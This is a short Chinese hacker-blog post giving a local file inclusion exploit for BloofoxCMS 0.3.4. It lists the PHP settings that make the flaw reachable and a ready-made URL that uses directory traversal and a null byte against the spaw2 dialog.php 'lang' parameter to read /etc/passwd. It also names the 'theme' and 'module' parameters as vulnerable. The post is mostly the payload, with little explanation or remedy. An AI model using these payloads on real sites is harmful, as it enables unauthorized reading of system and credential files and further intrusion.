导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

2008-12-28 23:39:25

BloofoxCMS Local File Inclusion Vulnerability

magic_quotes_gpc = Off
register_globals = On

- File Inclusion -
http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00

Also vulnerable:
dialog.php?theme=<lfi>
dialog.php?dialog=foo&module=<lfi>

原创文章如转载，请注明：转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址：http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/BloofoxCMS-Local-File-Inclusion-Vulnerability.html

Tags: php漏洞 注入

点击这里获取该日志的TrackBack引用地址

相关文章:
自由动力(My Power)3.6 sp2的注入漏洞 (2008-10-28 10:54:27)

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。

黑客榜之热文排行

黑客榜之本年排行

黑客榜之本月排行

黑客榜之随机文章

网站分类

搜索内容

最新评论及回复

最近发表

所属分类下的文章

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved